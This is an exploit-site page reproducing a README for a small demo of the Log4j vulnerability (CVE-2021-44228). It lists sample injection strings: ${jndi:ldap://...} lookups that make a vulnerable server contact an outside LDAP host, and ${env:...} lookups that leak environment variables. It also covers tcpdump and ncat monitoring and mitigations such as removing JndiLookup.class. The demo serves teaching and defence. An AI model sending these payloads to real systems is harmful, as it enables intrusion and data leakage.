Exploit for Deserialization of Untrusted Data in Apache Log4J exploit

Share

## https://sploitus.com/exploit?id=9326CB66-BADC-5643-B118-F38C39A9E34C # Log4j_Vulnerability_Demo A simple program to demonstrate how Log4j vulnerability can be exploited ( CVE-2021-44228 ) ## Running the Demo : To start the program, simply run the start.sh ( on UNIX systems ) or start.bat on Windows. User input will be read and logged to console using the Log4j framework. ### Some sample inputs : testing ( Normal String ) ### Examples which can be more than just a log message : #### ${env:USER} ( UNIX ) #### ${env:USERNAME} ( Windows ) #### ${jndi:ldap://test.java.net} #### ${jndi:ldap://localhost:12000} -- ### Monitoring : #### tcpdump -i any | grep -i "java.net" #### ncat -k -vv -c "echo hi" -l 12000 -- ### Removing the JndiLookup Class : #### zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class -- ### Disabling JNDI Lookups #### export LOG4J_FORMAT_MSG_NO_LOOKUPS=true